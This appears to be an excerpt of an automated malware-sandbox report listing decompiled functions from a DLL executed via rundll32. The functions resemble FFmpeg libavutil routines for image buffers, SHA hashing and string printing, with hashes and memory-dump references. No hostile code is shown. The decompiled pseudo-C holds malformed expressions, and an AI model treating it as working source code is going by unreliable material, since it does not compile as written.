
Similarity

API ID: mv_dict_freemv_dict_getmv_dict_setmv_logmv_opt_set
String ID: Error setting option %s to value %s.
API String ID: 1354616078-3279051434
Opcode ID: 1bc4169319db0e7c065ad1531228e2073ef3ecfc67cf9b47b9935cbba6993644
Instruction ID: 363f789e0d128d701feb49ee83ad72dbf536247a7b92236e9547f7cdcc278430
Opcode Fuzzy Hash: 1bc4169319db0e7c065ad1531228e2073ef3ecfc67cf9b47b9935cbba6993644
Instruction Fuzzy Hash: A1012CB9A097449FC744DF29D58059ABBE0FB88354F14892EF89CDB310E634E9449B86

Uniqueness

Uniqueness Score: -1.00%

Function 1001B0A4 Relevance: 6.1, APIs: 4, Instructions: 139
COMMON

Download Yara Rule

C-Code - Quality: 56%

			E1001B0A4(void* __ebx, void* __edi, void* __esi) {
				void* _t70;

				while(1) {
					__ebp = __ebp + __ebp;
					__eflags = __ebp - __esi;
					if(__eflags > 0) {
						break;
					}
					__eax =  *(__ebx + 0x44);
					__ebp =  ~__ebp;
					 *(__ebx + 0x44) + __ebp =  *(__ebx + 0x44) + __ebp - 1;
					__eax =  *(__ebx + 0x44) + __ebp - 0x00000001 &  ~__ebp;
					__esp[2] =  *(__ebx + 0x44) + __ebp - 0x00000001 &  ~__ebp;
					__eax =  *(__ebx + 0x50);
					 *__esp = __edi;
					__esp[1] =  *(__ebx + 0x50);
					__eax = E100215D0(__eflags);
					__eflags = __eax;
					__edx = __eax;
					if(__eax < 0) {
						L1:
						return _t70;
					}
					__eax =  *(__ebx + 0x20);
					__eflags = __esp[0xb] & __eax;
					if((__esp[0xb] & __eax) != 0) {
						continue;
					}
					__eflags = __eax;
					if(__eflags == 0) {
						L10:
						__esp[0xc] = __eax;
						__eax =  *(__ebx + 0x24);
						__esp[0xd] =  *(__ebx + 0x24);
						__eax =  *(__ebx + 0x28);
						__esp[0xe] =  *(__ebx + 0x28);
						__eax =  *(__ebx + 0x2c);
						__esp[0xf] =  *(__ebx + 0x2c);
						__eax =  *(__ebx + 0x48);
						__edi =  *(__ebx + 0x48) + 0x1f;
						__eax =  &(__esp[0xc]);
						__edi =  *(__ebx + 0x48) + 0x0000001f & 0xffffffe0;
						__esp[3] =  &(__esp[0xc]);
						__esp[2] = __edi;
						__eax =  *(__ebx + 0x50);
						__esp[1] =  *(__ebx + 0x50);
						__eax =  &(__esp[0x10]);
						 *__esp =  &(__esp[0x10]);
						__eax = L100219B0(__ebx, __edi, __esi, __ebp, __eflags);
						__eflags = __eax;
						__edx = __eax;
						if(__eax < 0) {
							goto L1;
						}
						__eax = 0x20;
						__ecx = __esp[0x10];
						__edx = 0x7fffffff;
						__eflags = __esp[0x1d] - 0x20;
						__ebp = 0x7fffffff;
						__eax =  >=  ? __esp[0x1d] : 0x20;
						__esi = 0x20;
						__eax = ( >=  ? __esp[0x1d] : 0x20) * 4;
						__ebp = 0x7fffffdf;
						__eflags = 0x7fffffdf - __ecx;
						if(0x7fffffdf < __ecx) {
							L24:
							__edx = 0xffffffea;
							goto L1;
						}
						__ecx = __ecx + __eax;
						__eax = __esp[0x11];
						0x7fffffff = 0x7fffffff - __ecx;
						__eflags = 0x7fffffff - __ecx - __eax;
						if(0x7fffffff - __ecx < __eax) {
							goto L24;
						}
						__eax = __eax + __ecx;
						__ecx = __esp[0x12];
						__ebp = 0x7fffffff;
						__ebp = 0x7fffffff - __eax;
						__eflags = 0x7fffffff - __ecx;
						if(0x7fffffff < __ecx) {
							goto L24;
						}
						__eax = __eax + __ecx;
						__ecx = __esp[0x13];
						__edx = 0x7fffffff - __eax;
						__eflags = 0x7fffffff - __eax - __ecx;
						if(0x7fffffff - __eax < __ecx) {
							goto L24;
						}
						__eax = L10009DC0(__ebx, __ecx, __edi, 0x20, __ecx);
						 *(__ebx + 0xb8) = __eax;
						__eflags = __eax;
						if(__eflags == 0) {
							__edx = 0xfffffff4;
							L26:
							__esp[0xb] = __edx;
							__ebx = E1001A460(__ebx);
							__edx = __esp[0xb];
							goto L1;
						}
						__edx = __ebx + 0x20;
						__esp[4] = __ebx + 0x20;
						__eax =  *(__eax + 4);
						__esp[2] = __edi;
						__esp[3] = __eax;
						__eax =  *(__ebx + 0x50);
						 *__esp = __ebx;
						__esp[1] =  *(__ebx + 0x50);
						__eax = L10021AF0(__ebx, __edi, __esi, __ebp, __eflags);
						__eflags = __eax;
						__edx = __eax;
						if(__eax < 0) {
							goto L26;
						}
						__eax =  *(__ebx + 4);
						__eflags = __eax;
						if(__eax != 0) {
							__eax = __eax + __esi;
							__eflags = __eax;
							 *(__ebx + 4) = __eax;
						}
						__eax =  *(__ebx + 8);
						__eflags = __eax;
						if(__eax != 0) {
							 *(__ebx + 8) = __eax;
						}
						__eax =  *(__ebx + 0xc);
						__eflags = __eax;
						if(__eax != 0) {
							__edx = __esi + __esi * 2;
							__eax = __eax + __esi + __esi * 2;
							__eflags = __eax;
							 *(__ebx + 0xc) = __eax;
						}
						 *(__ebx + 0x40) = __ebx;
						__edx = 0;
						goto L1;
					}
					break;
				}
				__ecx =  *(__ebx + 0x24);
				__eax = __esi + __eax - 1;
				__edx = __esi;
				__edx =  ~__esi;
				__eax = __eax & __edx;
				 *(__ebx + 0x20) = __eax;
				__eflags = __ecx;
				if(__eflags != 0) {
					__ecx = __esi + __ecx - 1;
					 *(__ebx + 0x24) = __ecx;
					__ecx =  *(__ebx + 0x28);
					__eflags = __ecx;
					if(__eflags != 0) {
						__ecx = __esi + __ecx - 1;
						 *(__ebx + 0x28) = __ecx;
						__ecx =  *(__ebx + 0x2c);
						__eflags = __ecx;
						if(__eflags != 0) {
							__edx = __edx & __ecx;
							__eflags = __edx;
							 *(__ebx + 0x2c) = __edx;
						}
					}
				}
				goto L10;
			}

0x1001b0a8
0x1001b0a8
0x1001b0aa
0x1001b0ac
0x00000000
0x00000000
0x1001b0ae
0x1001b0b3
0x1001b0b7
0x1001b0b8
0x1001b0ba
0x1001b0be
0x1001b0c1
0x1001b0c4
0x1001b0c8
0x1001b0cd
0x1001b0cf
0x1001b0d1
0x1001af07
0x1001af10
0x1001af10
0x1001b0d7
0x1001b0da
0x1001b0de
0x00000000
0x00000000
0x1001b0e0
0x1001b0e2
0x1001b121
0x1001b121
0x1001b125
0x1001b128
0x1001b12c
0x1001b12f
0x1001b133
0x1001b136
0x1001b13a
0x1001b13d
0x1001b140
0x1001b144
0x1001b147
0x1001b14b
0x1001b14f
0x1001b152
0x1001b156
0x1001b15a
0x1001b15d
0x1001b162
0x1001b164
0x1001b166
0x00000000
0x00000000
0x1001b16c
0x1001b171
0x1001b175
0x1001b17a
0x1001b17e
0x1001b180
0x1001b185
0x1001b187
0x1001b18e
0x1001b190
0x1001b192
0x1001b23d
0x1001b23d
0x00000000
0x1001b23d
0x1001b198
0x1001b19a
0x1001b1a0
0x1001b1a2
0x1001b1a4
0x00000000
0x00000000
0x1001b1aa
0x1001b1ac
0x1001b1b0
0x1001b1b2
0x1001b1b4
0x1001b1b6
0x00000000
0x00000000
0x1001b1bc
0x1001b1be
0x1001b1c2
0x1001b1c4
0x1001b1c6
0x00000000
0x00000000
0x1001b1cd
0x1001b1d2
0x1001b1d8
0x1001b1da
0x1001b2c7
0x1001b2cc
0x1001b2cc
0x1001b2d2
0x1001b2d7
0x00000000
0x1001b2d7
0x1001b1e0
0x1001b1e3
0x1001b1e7
0x1001b1ea
0x1001b1ee
0x1001b1f2
0x1001b1f5
0x1001b1f8
0x1001b1fc
0x1001b201
0x1001b203
0x1001b205
0x00000000
0x00000000
0x1001b20b
0x1001b20e
0x1001b210
0x1001b212
0x1001b212
0x1001b214
0x1001b214
0x1001b217
0x1001b21a
0x1001b21c
0x1001b221
0x1001b221
0x1001b224
0x1001b227
0x1001b229
0x1001b22b
0x1001b22e
0x1001b22e
0x1001b230
0x1001b230
0x1001b233
0x1001b236
0x00000000
0x1001b236
0x00000000
0x1001b0e2
0x1001b0e4
0x1001b0e7
0x1001b0eb
0x1001b0ed
0x1001b0ef
0x1001b0f1
0x1001b0f4
0x1001b0f6
0x1001b0f8
0x1001b0fe
0x1001b101
0x1001b104
0x1001b106
0x1001b108
0x1001b10e
0x1001b111
0x1001b114
0x1001b116
0x1001b11c
0x1001b11c
0x1001b11e
0x1001b11e
0x1001b116
0x1001b106
0x00000000

APIs

mv_image_fill_linesizes.F086 ref: 1001B0C8

Part of subcall function 100215D0: mv_pix_fmt_desc_get.F086(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,1001B0CD), ref: 100215E6

mv_image_fill_plane_sizes.F086 ref: 1001B15D
mv_buffer_alloc.F086 ref: 1001B1CD
mv_image_fill_pointers.F086 ref: 1001B1FC

Memory Dump Source

Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.488304107.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488403231.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488409319.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488434034.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488441517.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488476954.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: mv_buffer_allocmv_image_fill_linesizesmv_image_fill_plane_sizesmv_image_fill_pointersmv_pix_fmt_desc_get
String ID:
API String ID: 2879504290-0
Opcode ID: 104ea71f64bcf6d5fcf77d597bbab15b8274068533c11a176288c866d61d2df4
Instruction ID: 7a3e12a9aca585330d458c3661a5f2850fdcc4197d16b6054e58506080106dfe
Opcode Fuzzy Hash: 104ea71f64bcf6d5fcf77d597bbab15b8274068533c11a176288c866d61d2df4
Instruction Fuzzy Hash: 1F51F8B5608B018FCB48DF69D59066ABBE1FF88240F1589BDE949CB319E731E844CB41

Uniqueness

Uniqueness Score: -1.00%

Function 100A02F0 Relevance: 6.1, APIs: 4, Instructions: 93COMMON

Download Yara Rule

APIs

IsDBCSLeadByteEx.KERNEL32 ref: 100A0342
MultiByteToWideChar.KERNEL32 ref: 100A0385

Memory Dump Source

Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.488304107.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488403231.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488409319.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488434034.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488441517.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488476954.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Byte$CharLeadMultiWide
String ID:
API String ID: 2561704868-0
Opcode ID: ff6f7197c44d7e7dccd4158c33b178a144c6c1fe7609a9ede9ad65282b7dc5a0
Instruction ID: 7d595e0308f4db80fc988514bbf5ff759a63fd2ee38edf780f56cffaa40d1ea8
Opcode Fuzzy Hash: ff6f7197c44d7e7dccd4158c33b178a144c6c1fe7609a9ede9ad65282b7dc5a0
Instruction Fuzzy Hash: 3D31F4B1509351CFDB40DF69D48420ABBE0FF8A354F05896DF9D48B290E3B6DA48CB42

Uniqueness

Uniqueness Score: -1.00%

Function 10035254 Relevance: 6.1, APIs: 4, Instructions: 77COMMON

Download Yara Rule

APIs

clock.MSVCRT ref: 10035293
mv_sha_init.F086 ref: 1003532D
mv_sha_update.F086 ref: 10035347
mv_sha_final.F086 ref: 10035357

Memory Dump Source

Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.488304107.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488403231.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488409319.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488434034.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488441517.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488476954.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: clockmv_sha_finalmv_sha_initmv_sha_update
String ID:
API String ID: 679641161-0
Opcode ID: e23dd5efd1bf3d0f9353d7ec12f2411e5e10918d39fbe7231d3abc0c1350133f
Instruction ID: 408675c28d2283c62ae71b4a23e78d15769cea63b3a73d0841c587d7b5b59e14
Opcode Fuzzy Hash: e23dd5efd1bf3d0f9353d7ec12f2411e5e10918d39fbe7231d3abc0c1350133f
Instruction Fuzzy Hash: 4621C176A043108FE308DF68CAC0249BBE2FBC9315F55C97DD9888B365E671DD058B95

Uniqueness

Uniqueness Score: -1.00%

Function 1001F080 Relevance: 6.1, APIs: 4, Instructions: 73COMMON

Download Yara Rule

APIs

mv_mallocz.F086 ref: 1001F0A0
mv_realloc_f.F086 ref: 1001F0DD

Part of subcall function 10028DE0: _aligned_realloc.MSVCRT ref: 10028E11

mv_buffer_create.F086 ref: 1001F128

Memory Dump Source

Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.488304107.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488403231.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488409319.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488434034.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488441517.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488476954.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: _aligned_reallocmv_buffer_createmv_malloczmv_realloc_f
String ID:
API String ID: 2794559729-0
Opcode ID: 26fbe21ab545ebdd34baa87320ddca8e1bb2c4f4deb69b9881e6a88837f94b66
Instruction ID: c869ac9f6eaa7e77a9466fdee6e8f712de869673a1390132f44f2bab79372784
Opcode Fuzzy Hash: 26fbe21ab545ebdd34baa87320ddca8e1bb2c4f4deb69b9881e6a88837f94b66
Instruction Fuzzy Hash: 8031ACB4A08701DFC300DF29C58051AFBF1FF98250F568A6EE9889B321D771E881CB82

Uniqueness

Uniqueness Score: -1.00%

Function 10007050 Relevance: 6.0, APIs: 4, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E10007050(intOrPtr __ebx, void* __edi, void* __esi, void* __ebp, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				intOrPtr _v4;
				intOrPtr _v1028;
				intOrPtr _v1032;
				char _v1036;
				intOrPtr _v1052;
				intOrPtr _v1056;
				intOrPtr _v1060;
				intOrPtr _v1064;
				intOrPtr _t29;
				char* _t32;
				intOrPtr* _t39;

				_t37 = __esi;
				_t36 = __edi;
				_v4 = __ebx;
				_t32 =  &_v1036;
				_v1060 = 0x7fffffff;
				_v1064 = 1;
				 *_t39 = _t32;
				L10008880(_t32, __edi, __esi, __ebp);
				 *_t39 = _t32;
				_v1052 = _a20;
				_v1056 = _a16;
				_v1060 = _a12;
				_v1064 = _a8;
				L10009730();
				if(_v1032 >= _v1028) {
					 *_t39 = _t32;
					_v1064 = 0;
					E10009690(_t32, 1, _t36, _t37);
					_t29 = 0xfffffff4;
				} else {
					 *_t39 = _t32;
					_v1064 = _a4;
					_t29 = E10009690(_t32, 1, _t36, _t37);
					if(_t29 >= 0) {
						_t29 = _v1032;
					}
				}
				return _t29;
			}

0x10007050
0x10007050
0x1000705b
0x10007062
0x1000706b
0x1000706f
0x10007073
0x10007076
0x10007082
0x10007085
0x10007090
0x1000709b
0x100070a6
0x100070aa
0x100070b7
0x100070e8
0x100070ed
0x100070f1
0x100070f6
0x100070b9
0x100070b9
0x100070c3
0x100070c7
0x100070ce
0x100070d0
0x100070d0
0x100070ce
0x100070e1

APIs

mv_bprint_init.F086 ref: 10007076
mv_bprint_escape.F086 ref: 100070AA

Part of subcall function 10009730: mv_bprintf.F086(?,?,?,?,?,?,?,?,?,?,100070AF), ref: 100097FB

mv_bprint_finalize.F086 ref: 100070C7

Part of subcall function 10009690: mv_realloc.F086(?,?,?,?,?,?,10006D57), ref: 100096C9

mv_bprint_finalize.F086 ref: 100070F1

Memory Dump Source

Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.488304107.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488403231.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488409319.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488434034.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488441517.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488476954.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: mv_bprint_finalize$mv_bprint_escapemv_bprint_initmv_bprintfmv_realloc
String ID:
API String ID: 2707718180-0
Opcode ID: 8fcf3987ad7d05698dc9ea44ca5edbe39d28e2b760c260b832d1773102fd6b80
Instruction ID: 7786e306f37471b19b8e033861bf3e046f7241f8be26b7eb16500715b45264db
Opcode Fuzzy Hash: 8fcf3987ad7d05698dc9ea44ca5edbe39d28e2b760c260b832d1773102fd6b80
Instruction Fuzzy Hash: 9F116DB4A093408BD360DF28C18065EBBE0BF88254F908E2DBA9C87345E635A944CB06

Uniqueness

Uniqueness Score: -1.00%

Function 1001140B Relevance: 6.0, APIs: 4, Instructions: 22
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1001140B(void* __ebx, void* __esi, intOrPtr _a40, intOrPtr _a44, void* _a60, void* _a64, void* _a68, void* _a72, intOrPtr _a80) {
				intOrPtr* _t17;

				E100290E0(__ebx);
				E100290E0(_a80);
				 *_t17 = _a40;
				L100290D0();
				 *_t17 = _a44;
				L100290D0();
				return __esi;
			}

0x10011416
0x10011422
0x100112a2
0x100112a5
0x100112ae
0x100112b1
0x100112cb

APIs

mv_freep.F086 ref: 10011416
mv_freep.F086 ref: 10011422

Memory Dump Source

Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.488304107.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488403231.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488409319.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488434034.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488441517.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488476954.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: mv_freep
String ID:
API String ID: 2373662943-0
Opcode ID: b8978aa5356de5e0d0452b52506a000fc5e3e76e5db4869c3fd5d98213d9114f
Instruction ID: 289599a6c336a5d98a65091fe60646c07369103d16afa4f254b85444868d10c6
Opcode Fuzzy Hash: b8978aa5356de5e0d0452b52506a000fc5e3e76e5db4869c3fd5d98213d9114f
Instruction Fuzzy Hash: 86E079795087188FC600EB68948191AB7F0EB89284F854C1DE9C4A7302D675E940CA82

Uniqueness

Uniqueness Score: -1.00%

Function 10022390 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 94COMMON

Download Yara Rule

Strings

Assertion %s failed at %s:%d, xrefs: 100224BA

Memory Dump Source

Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.488304107.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488403231.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488409319.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488434034.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488441517.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488476954.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: mv_get_cpu_flags
String ID: Assertion %s failed at %s:%d
API String ID: 185405932-2766368343
Opcode ID: 6c1046a228a6480c7155eb2475d82291d57ca262918e156c95d3f1e11567d0db
Instruction ID: 9000e0a9215e96f19705fc5f92f59cb8436bb03ac98e3bf4af9b514e39ffaf03
Opcode Fuzzy Hash: 6c1046a228a6480c7155eb2475d82291d57ca262918e156c95d3f1e11567d0db
Instruction Fuzzy Hash: 454112B5A08381AFC740DF94D58051EFBF1FF88740F91891DE99997300D7BAEA858B42

Uniqueness

Uniqueness Score: -1.00%

Function 100224F0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 83
COMMON

Download Yara Rule

C-Code - Quality: 28%

			E100224F0(signed char _a4, signed int _a8, void* _a12, signed int _a16, int _a20, char _a24) {
				intOrPtr _v40;
				char* _v44;
				char* _v48;
				char* _v52;
				char* _v56;
				signed char _t32;
				void* _t34;
				int _t35;
				int _t43;
				void* _t47;
				void* _t49;
				void* _t52;
				signed int _t54;
				signed int _t55;
				void _t56;
				char** _t57;

				_t57 =  &_v44;
				_t32 = _a4;
				_t47 = _a12;
				_t54 = _a16;
				_t35 = _a20;
				if(_t32 == 0 || _t47 == 0) {
					L12:
					return _t32;
				} else {
					_t38 =  <  ? _t54 :  ~_t54;
					_t60 = _t35 - ( <  ? _t54 :  ~_t54);
					if(_t35 > ( <  ? _t54 :  ~_t54)) {
						L17:
						_v40 = 0x15e;
						_v44 = "libavutil/imgutils.c";
						_v48 = "((src_linesize) >= 0 ? (src_linesize) : (-(src_linesize))) >= bytewidth";
						L16:
						_v52 = "Assertion %s failed at %s:%d\n";
						_v56 = 0;
						 *_t57 = 0;
						E10026560();
						abort();
						goto L17;
					}
					_t41 =  <  ? _a8 :  ~_a8;
					_t61 = _t35 - ( <  ? _a8 :  ~_a8);
					if(_t35 > ( <  ? _a8 :  ~_a8)) {
						_v40 = 0x15f;
						_v44 = "libavutil/imgutils.c";
						_v48 = "((dst_linesize) >= 0 ? (dst_linesize) : (-(dst_linesize))) >= bytewidth";
						goto L16;
					}
					if(_a24 <= 0) {
						goto L12;
					}
					_a16 = _t54;
					do {
						_t43 = _t35;
						_t49 = _t32;
						_t52 = _t47;
						if(_t35 >= 8) {
							if((_t32 & 0x00000001) != 0) {
								_t49 = _t32 + 1;
								_t52 = _t47 + 1;
								 *_t32 =  *_t47 & 0x000000ff;
								_t43 = _t35 - 1;
							}
							if((_t49 & 0x00000002) != 0) {
								_t55 =  *_t52 & 0x0000ffff;
								_t49 = _t49 + 2;
								_t52 = _t52 + 2;
								_t43 = _t43 - 2;
								 *(_t49 - 2) = _t55;
							}
							if((_t49 & 0x00000004) != 0) {
								_t56 =  *_t52;
								_t49 = _t49 + 4;
								_t52 = _t52 + 4;
								_t43 = _t43 - 4;
								 *(_t49 - 4) = _t56;
							}
						}
						_t34 = memcpy(_t49, _t52, _t43);
						_t57 =  &(_t57[3]);
						_t32 = _t34 + _a8;
						_t47 = _t47 + _a16;
						_t11 =  &_a24;
						 *_t11 = _a24 - 1;
					} while ( *_t11 != 0);
					goto L12;
				}
			}

0x100224f4
0x100224f7
0x100224fb
0x100224ff
0x10022503
0x10022509
0x1002258f
0x1002258f
0x1002250f
0x10022513
0x10022516
0x10022518
0x100225eb
0x100225eb
0x100225f3
0x100225fb
0x100225d0
0x100225d0
0x100225da
0x100225de
0x100225e1
0x100225e6
0x00000000
0x100225e6
0x10022524
0x10022529
0x1002252b
0x100225b8
0x100225c0
0x100225c8
0x00000000
0x100225c8
0x10022537
0x00000000
0x00000000
0x10022539
0x10022554
0x10022557
0x10022559
0x1002255b
0x1002255d
0x10022561
0x100225ab
0x100225ae
0x100225b1
0x100225b3
0x100225b3
0x10022569
0x10022590
0x10022593
0x10022596
0x10022599
0x1002259c
0x1002259c
0x10022571
0x10022573
0x10022575
0x10022578
0x1002257b
0x1002257e
0x1002257e
0x10022571
0x10022540
0x10022540
0x1002254a
0x1002254c
0x1002254e
0x1002254e
0x1002254e
0x00000000
0x10022554

APIs

mv_log.F086 ref: 100225E1
abort.MSVCRT ref: 100225E6

Strings

Assertion %s failed at %s:%d, xrefs: 100225D0

Memory Dump Source

Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.488304107.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488403231.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488409319.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488434034.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488441517.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488476954.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: abortmv_log
String ID: Assertion %s failed at %s:%d
API String ID: 2075109169-2766368343
Opcode ID: 96ccb67a9ced400229960c739ff5e4974aafcccf3633072cb66a9d878579e67e
Instruction ID: 11814923a7bf7540ef128da13c98316d9c3b81b6007f7c64051ac5900c87ea26
Opcode Fuzzy Hash: 96ccb67a9ced400229960c739ff5e4974aafcccf3633072cb66a9d878579e67e
Instruction Fuzzy Hash: 5C318D75A08B219BC708CF90E5A452EFBF1EFC1750FD1841CE98957200D77A9984CB82

Uniqueness

Uniqueness Score: -1.00%

Function 100221C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 69COMMON

Download Yara Rule

APIs

mv_image_get_linesize.F086 ref: 10022203

Part of subcall function 10021480: mv_pix_fmt_desc_get.F086(?,?,?,?,?,?,?,?,?,?,00000000,?,100B6C20,00000000,10022208), ref: 10021496

Strings

Picture size %ux%u is invalid, xrefs: 1002228D

Memory Dump Source

Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.488304107.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488403231.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488409319.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488434034.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
